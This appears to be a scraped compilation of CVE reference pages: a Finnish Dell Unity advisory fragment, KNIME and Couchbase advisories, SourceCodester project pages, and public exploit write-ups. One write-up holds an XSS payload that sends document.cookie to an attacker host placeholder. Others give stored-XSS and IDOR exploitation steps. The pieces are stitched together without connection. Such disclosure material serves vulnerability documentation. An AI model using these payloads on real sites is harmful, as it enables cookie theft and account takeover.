CVE-2021-4193

CVE-2021-46059

CVE-2022-0319

CVE-2022-0351

CVE-2022-0361

CVE-2022-0413

xerces-s

CVE-2018-1311

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen****Versiohistoria**

**Revision**

**Date**

**More Informatio**n

1.0

2022-04-29

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Juridiset tiedot**

Tämän Dell Technologiesin tietoturvatiedotteen tiedot on luettava, ja niiden avulla voidaan välttää tilanteita, jotka voivat johtua tässä kuvatuista ongelmista. Dell Technologiesin tietoturvatiedotteet tuovat tärkeitä tietoturvatietoja haavoittuvuudelle alttiiden tuotteiden käyttäjien tietoon. Dell Technologies arvioi riskin perustuen asennettujen järjestelmien hajautetun joukon keskimääräisiin riskeihin, eikä se välttämättä vastaa paikallisen asennuksen ja yksittäisen ympäristön todellista riskiä. Suositus on, että kaikki käyttäjät ratkaisevat näiden tietojen sovellettavuuden yksittäisten ympäristöjen mukaan ja ryhtyvät tarvittaviin toimenpiteisiin. Tässä esitetyt tiedot annetaan "sellaisenaan" ilman minkäänlaista takuuta. Dell Technologies kiistää kaikki suorat tai epäsuorat takuut, mukaan lukien takuut soveltuvuudesta kaupankäynnin kohteeksi, sopivuudesta tiettyyn käyttötarkoitukseen, omistusoikeudesta ja loukkaamattomuudesta. Dell Technologies, sen tytäryhtiöt tai toimittajat eivät missään tilanteessa ole vastuussa mistään vahingoista, jotka johtuvat tässä asiakirjassa mainituista tiedoista tai toimenpiteistä, joihin käyttäjä päättää ryhtyä. Tämä koskee kaikkia suoria, epäsuoria, satunnaisia, välillisiä, liikevoiton menetykseen liittyviä tai erityisluontoisia vahinkoja, vaikka Dell Technologies tai sen tytäryhtiöt tai toimittajat olisivat saaneet tiedon tällaisten vahinkojen mahdollisuudesta. Jotkin osavaltiot eivät salli satunnaisten tai seuraamuksellisten vahinkojen vastuun poistamista tai rajoittamista, joten edellä mainittua rajoitusta sovelletaan vain lain sallimassa laajuudessa.

**Artikkelin ominaisuudet**

**Tuote, johon asia vaikuttaa**

Dell EMC Unity 300, Dell EMC Unity 300F, Dell EMC Unity 350F, Dell EMC Unity 400, Dell EMC Unity 400F, Dell EMC Unity 450F, Dell EMC Unity 500, Dell EMC Unity 500F, Dell EMC Unity 550F, Dell EMC Unity 600

**Tuote**

Product Security Information, Dell EMC Unity 600F, Dell EMC Unity 650F, Dell EMC Unity XT 680, Dell EMC Unity XT 680F, Dell EMC Unity XT 880, Dell EMC Unity XT 880F, Dell EMC UnityVSA (Virtual Storage Appliance)

**Edellinen julkaisupäivä**

29 huhtik. 2022

**Versio**

1

**Artikkelin tyyppi**

Dell Security Advisory

CVE-2022-29085: DSA-2022-021: Dell Unity, Dell UnityVSA, and Dell Unity XT Security Update for Multiple Vulnerabilities

A vulnerability was found in SourceCodester Product Show Room Site 1.0. It has been declared as problematic. This vulnerability affects p=contact. The manipulation of the Message textbox with the input <script>alert(1)</script> leads to cross site scripting. The attack can be initiated remotely but requires authentication. Exploit details have been disclosed to the public.

**Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)****Exploit Title: Product Show Room Site - 'Message' Stored Cross-Site Scripting(XSS)****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html****Software Link: https://www.sourcecodester.com/download-code?nid=15370&title=Product+Show+Room+Site+in+PHP%2FOOP+Free+Source+Code****Version: Product Show Room Site 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description**

Persistent XSS (or Stored XSS) attack is one of the three major categories of XSS attacks, the others being Non-Persistent (or Reflected) XSS and DOM-based XSS. In general, XSS attacks are based on the victim’s trust in a legitimate, but vulnerable, website or web application.Product Show Room Site does not filter the content correctly at the "Contact info-Telephone" module, resulting in the generation of stored XSS.

**Payload used:**

<script>alert(111)</script>

**Proof of Concept**

1.  Login the CMS. Default Admin Access Username: admin Password: admin123
    
2.  Open Page http://172.24.5.107/psrs/?p=contact
    
3.  Put XSS payload (<script>alert(111)</script>) in the Message box and click on Send Message to publish the page  
    
4.  Open http://172.24.5.107/psrs/admin/?page=inquiries,Viewing the Top 1 of Inquiries page,We can see the alert.

CVE-2022-1979: webray.com.cn/'Message' Stored Cross-Site Scripting(XSS).md at main · Xor-Gerke/webray.com.cn

Couchbase Server before 7.1.0 has Incorrect Access Control.

CVE-2021-33504: Alerts | Couchbase

In KNIME Analytics Platform below 4.6.0, the Windows installer sets improper filesystem permissions.

This page summarizes all security advisories for KNIME Software products and services, including KNIME Analytics Platform, KNIME Server, and KNIME Hub.

Please note that the CVSS Score is an indication of the potential _severity_ of the issue but not the _risk_. The actual risk needs to be assessed by every user individually because there may be circumstances where a high severity issue is not applicable and therefore does not pose a risk (and vice-versa).

If you want to know more about the CVSS Score, have a look at the resources provided by the Common Vulnerability Scoring System SIG.

**CVE-2022-31500 - Windows installer for KNIME Analytics Platform allows for privilege escalation**

*   Published: 2022-05-24
*   Affected Product: KNIME Analytics Platform before 4.6.0
*   Base CVSS Score: 8.2
*   Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H/E:F/RL:T/RC:X/CR:L/IR:L/AR:L/MAV:L/MAC:L/MPR:N/MUI:R/MS:C/MC:H/MI:H/MA:H

The installer for KNIME Analytics Platform on Windows before 4.6.0 makes the installation directory writeable to everyone on the system. This is useful so that the user can update or install extensions from a running KNIME Analytics Platform without having to restart the application as administrator. However, this also allows other authenticated local users on the system to (re)place malicious files in the installation e.g. replacing the uninstall program. The latter is run with administration privileges if the application is being uninstalled (by a user with administrative privileges). Starting with KNIME Analytics Platform 4.6.0 the installer will restrict write access to the installation directory to admin users. This also means that in order to update or install additional extensions, KNIME Analytics Platform must first be started with admin privileges.

Note that the KNIME Server installer for Windows, which can create a KNIME Analytics Platform installation used as an executor, is **not** affected.

**Workaround**

Existing installations can be "fixed" by restricting the permissions of the installation folder manually. If you use the self-extracting archive or the ZIP file the default permissions on Windows apply, which usually means that only the extracting user has write permissions on the installation directory. In this case update or installation of extensions is possible without starting KNIME Analytics Platform as admin user.

The vulnerability was found and reported by Łukasz Rupala & Przemysław Mazurek.

**CVE-2021-45096 - External XML Entity Injection with specially crafted workflow files**

*   Published: 2021-12-16
*   Affected Product: KNIME Analytics Platform before 4.5.0
*   Base CVSS Score: 4.3
*   Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

KNIME Analytics Platform before 4.5.0 with resolve external entities in workflow.knime files when loading a workflow. Using a specially crafted workflow file, potentially sensitive information such as Windows network password hashes maybe leaked _to_ a remote system. It can not be used to leak information _from_ a remote system e.g. when a workflow is loaded on KNIME Server.

The vulnerability was found and reported by Dawid Czarnecki from NATO.

****CVE-2021-45097 -** Server installer does not restrict permission on auto-install.xml**

*   Published: 2021-12-16
*   Affected Product: KNIME Server before 4.12.6 and 4.13.x before 4.13.4
*   Base CVSS Score: 2.9
*   Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

KNIME Server before 4.12.6 and 4.13.x before 4.13.4 (when installed in unattended mode) keeps the administrator's password in a file without appropriate file access controls, allowing all local users to read its content.

The vulnerability was found and reported by Dawid Czarnecki from NATO.

**CVE-2021-44725 - Directory path traversal when requesting client profiles**

*   Published: 2021-12-07
*   Affected Product: KNIME Server between 4.7.0 and below 4.11.6, 4.12.5, 4.13.4, respectively
*   Base CVSS Score: 7.5
*   Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

The server managed customizations functionality of KNIME Server starting at version 4.7.0 is vulnerable to Directory Path Traversal attacks. By manipulating variables that reference files by prepending “dot-dot-slash (../)” sequences and their variations or by using absolute file paths, it is possible to access arbitrary files and directories stored on the file system including application source code, configuration, and database. Due to the file-based architecture of KNIME Server, this vulnerability allows stealing users' data  
such as password hashes, workflows, licenses, jobs, and so on. No authentication is required to exploit this vulnerability.

The issue is fixed in KNIME Server 4.13.4, 4.12.5, and 4.11.6 which have been released today. All customers are advised to update their server's immediately.

**Workaround**

If you cannot update right away you can apply the following workaround which prevents access to client profiles for any user:

1.  Locate _<apache-tomcat>/webapps/knime/WEB-INF/web.xml_
2.  Edit the file and add the following block before the existing line <deny-uncovered-http-methods /> at the bottom of the file:
    
       ...
       <security-constraint>
          <web-resource-collection>
             <web-resource-name>Profiles
             <url-pattern>/rest/v4/profiles/contents
          </web-resource-collection>
          <auth-constraint />
       </security-constraint>
    
       <deny-uncovered-http-methods />
    </web-app>
    
3.  Restart KNIME Server.

The vulnerability was found and reported by Dawid Czarnecki from NATO.

**CVE-2021-44726 - Cross-Site-Scripting vulnerability in old WebPortal login**

*   Published: 2021-12-07
*   Affected Product: KNIME Server below 4.13.4
*   Base CVSS Score: 8.8
*   Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L

The old KNIME WebPortal login page up to version 4.13.3 contains a DOM-based XSS vulnerability that once exploited, can be used to run any action as a victim user via malicious JavaScript. If the victim user is an administrator, it could be used to create a new administrator. To exploit the vulnerability it is required to create a specially crafted URL and convince the victim to open it. No authentication is required to exploit the vulnerability, however, authenticated users can be targeted.

The vulnerability was found and reported by Dawid Czarnecki from NATO

CVE-2022-31500: Security Advisories | KNIME

School Dormitory Management System v1.0 is vulnerable to reflected cross-site scripting (XSS) via admin/inc/navigation.php:125

Submitted by oretnom23 on Saturday, May 7, 2022 - 16:08.

****Introduction****

This project is entitled **School Dormitory Management System**. This is a web-based application project developed in **PHP** and **MySQL Database**. This project provides an online and automated platform for **Universities or Colleges' Dormitory** to manage their monthly collections and records. The system consist consists of multiple features that include the student dorm accounts. The application was developed with **Bootstrap Framework** and **AdminLTE Template**. It consists of user-friendly features and functionalities.

****About the School Dormitory Management System****

I developed this project using the following:

*   **XAMPP v3.3.0**
*   **PHP**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **Ajax**
*   **jQuery**
*   **Bootstrap**
*   **Font Awesome**
*   **AdminLTE**

This **School Dormitory Management System** can be only accessed by the management. The system features and functionalities can be accessed only by the registered system users. The system users have 2 types of roles which are the **Administrator** and **Staff**. Both Users must log in with their system credentials to gain access to the features and functionalities of the application. The **Administrator Users** have the privilege to access and manage all the features and functionalities of the system while **Staff Users** have only limited permissions.

This Dormitory Management System allows the management to manage the list of dormitory buildings, rooms in each dorm, and student accounts. The management must populate first the list of dorms, rooms, and students when using the system for the first time. Users create an account for a student and assign them to a room with an available slot. The student that has an active account will be automatically removed from the student options when creating an account. Also, the room option in the account registry only lists the rooms that have available slots.

The system was developed with user-friendly features and functionalities with CRUD (Create, Read, Update, and Delete) Operations. It can help the school management to efficiently and effectively manage the dorms' collections and account records.

****Features****

*   **Home Page**
    *   Display the summary.
*   **Dorm Management**
    *   Add New Dorm
    *   List All Courts
    *   View Dorm Details
    *   Update Dorm Details
    *   Delete Dorm
*   **Room Management**
    *   Add New Room
    *   List All Rooms
    *   View Room Details
    *   Update Room Details
    *   Delete Room
*   **Student Management**
    *   Add New Student
    *   List All Students
    *   View Student Details
    *   Update Student Details
    *   Delete Student
*   **Account Management**
    *   Add New Account
    *   List All Accounts
    *   View Account Details
    *   Update Account Details
    *   Add Payment
    *   List Payment History
    *   Edit Payment Details
    *   Delete Payment Details
    *   Delete Account
*   **Report**
    *   Generate Printable Monthly Collection Report
*   **User Management**
    *   Add New User
    *   List All Users
    *   View User Details
    *   Edit User Details
    *   Delete User Details
*   **Update System Information**
*   **Update Account Details/Credentials**
*   **Login and Logout**

The source code was developed only for educational purposes only. You can download the source code for free and modify it the way you wanted.

**System Snapshots of some Features******Dashboard****

****Dorm List****

****Room List****

****Student Details Page****

****Account Details Page****

****Payment History Modal****

****Monthly Collection Report****

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Enable** the **GD Library** in your **php.ini** file.
2.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
5.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
6.  **Create** a **new database** naming ****dms\_db****.
7.  **Import** the provided ****SQL**** file. The file is known as ****dms\_db.sql**** located inside the **database** folder.
8.  **Browse** the **School Dormitory Management System** in a **browser**. i.e. ****http://localhost/dms/****.

****Admin Default Access:****

Username: **admin**  
Password: **admin123**

****DEMO VIDEO****

That's it. You can now explore the features and functionalities of this **School Dormitory Management System** in **PHP**. I hope this will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   2369 views

CVE-2022-30513: School Dormitory Management System in PHP/OOP Free Source Code

An insecure direct object reference (IDOR) in Online Market Place Site v1.0 allows attackers to modify products that are owned by other sellers.

**Exploit Title: Online Market Place Site v1.0 - Insecure Direct Object Reference(IDOR)****Exploit Author: NS Kumar (n1\_x)****Date: April 17, 2022****Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html****Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip****Tested on: Parrot Linux, Apache, Mysql****Vendor: oretnom23****Version: v1.0****Exploit Description:****Online Market Place v1.0 suffers from IDOR - Broken Access Control Vulnerability allowing attackers to modify the product that owned by other sellers(vertical privilege escalation).**

\---------------------------------------- To Exploit ---------------------------------------------------------

Step 1: Register and login as a seller.

Step 2: Goto product page click action and select edit product, you can see url like http://localhost/omps/seller/?page=products/view\_details&id=4

Step 3: The id parameter is the vulnerable to insecure direct object reference(idor).

step 4: change the product id that not listed in your product page.

step 5: Now You can edit the product of other sellers.

CVE-2022-29627: OpenSource/exploit_idor.md at main · nsparker1337/OpenSource

A cross-site scripting (XSS) vulnerability in /omps/seller of Online Market Place Site v1.0 allows attackers to execute arbitrary web cripts or HTML via a crafted payload injected into the Page parameter.

**Exploit Title: Online Market Place Site v1.0 - XSS and CSRF****Date: April 17, 2022****Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html****Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip****Tested on: Parrot Linux, Apache, Mysql****Vendor: oretnom23****Version: v1.0****Exploit Description:****Online Market Place v1.0 suffers from Cross Site Scripting and Cross Site Request Forgery Vulnerability that allowing attackers to steal the cookies of other users(possible account takeover).**

\---------------------------------------- To Exploit ---------------------------------------------------------

Step 1: Register and login as a seller.

Step 2: Goto product page click action and select view product, you can see url like http://localhost/omps/seller/?page=products/view\_details&id=4

Step 3: The page parameter is the vulnerable to cross site scripting because it's not sanitizing the user input.

step 4: put the payload  and you will see the pop window that reflects 1337.

step 5: Now attacker can send malicious url to other user then perfom csrf and finally takeover their account.

For stealing the cookies : <img src='x' onerror=this.src=http://ip:port/?'+document.cookie;>

Final Payload : http://localhost/omps/seller/?page=<img src='x' onerror=this.src=http://ip:port/?'+document.cookie;>&id=4

CVE-2022-29628: OpenSource/exploit_rxss.md at main · nsparker1337/OpenSource

Responsive Online Blog v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at single.php.

Submitted by donbermoy on Thursday, February 4, 2021 - 10:41.

This is a **Responsive Online Blogging Site** using **PHP/MySQL** that I did in my previous years as a project to my client for his Thesis/Capstone Project. I may say that this is a responsive web application because it has a lot of features such as calculating the views coming from the guests, embedded a map, and many more features.

The online site has an admin panel where published blogs, categories, drafts, web details, links, editor's choice, and the admin stats. The admin can also post his desired blog of the day and well as managing it also.

Just like other **Blogging sites**, this project offers users to read blogs of various categories. From the admin panel, he/she can add categories, manage posts and delete categories. The layout is pretty similar to WordPress blogging theme. Here, the site administrator can add a number of posts according to the categories they want and the blogs can also be viewed by selecting a certain category. The design of this project is simple and the user won’t find it difficult to understand, use and navigate.

****Features****

**Admin**

*   **Manage Blog Categories**
*   **Manage Blogs**
*   **Manage Website Details**
*   **Manage Editors Choice Contents**
*   **Admin Statistic Report**

**Website**

*   **Mobile Responsive Design**
*   **Home Page**
*   **Blog List**
*   **Display Website Information**
*   **Author Registration**
*   **View Blog Content**

****How to Run****

Just follow all the instructions to run it smoothly.

**Requirements:**

*   **Download** and **Install** any **local web server** such as **XAMPP/WAMP.**
*   **Download** and **Extract** the provided source code **zip** file. (download button is located below)

**Installation**

*   **Open** your **XAMPP/WAMP's Control Panel** and start the **"Apache"** and **"MySQL"**.
*   If you using **XAMPP**, **copy** the extracted folder and **paste** it into the xampp's **"htdocs" directory** (C:\\xampp\\htdocs). And if you are using **WAMP**, **paste** it inside the **"www" directory**.
*   **Locate** the **SQL file** from the source code folder. The file is known as **"blog\_admin\_db.sql"** and located inside the **"databasefile" directory.**
*   **Open** a web browser and browse the **PHPMyAdmin**. (http://localhost/phpmyadmin)
*   **Create** a new **database** naming **"blog\_admin\_db"**.
*   **Import** the **SQL** file in your **newly created database**.
*   Open a web browser and browse the web application. **(http://localhost/resblog)**

**You can access this system using the following accounts**

*   Username: **admin**
*   Password: **admin**

**Installation DEMO**

That's it you can now test the Blog Site project. I hope this will help you with what you are looking for.

**Enjoy Coding :)**

**Engr. Lyndon R. Bermoy**  
IT Instructor/System Developer/Android Developer  
Mobile: 09079373999  
Telephone: 826-9296  
E-mail:\[email protected\]

Visit and like my page on Facebook at Bermz ISware Solutions

Subscribe to my YouTube Channel at SerBermz

Visit my website at CampCodes

*   28655 views

Tag

#apache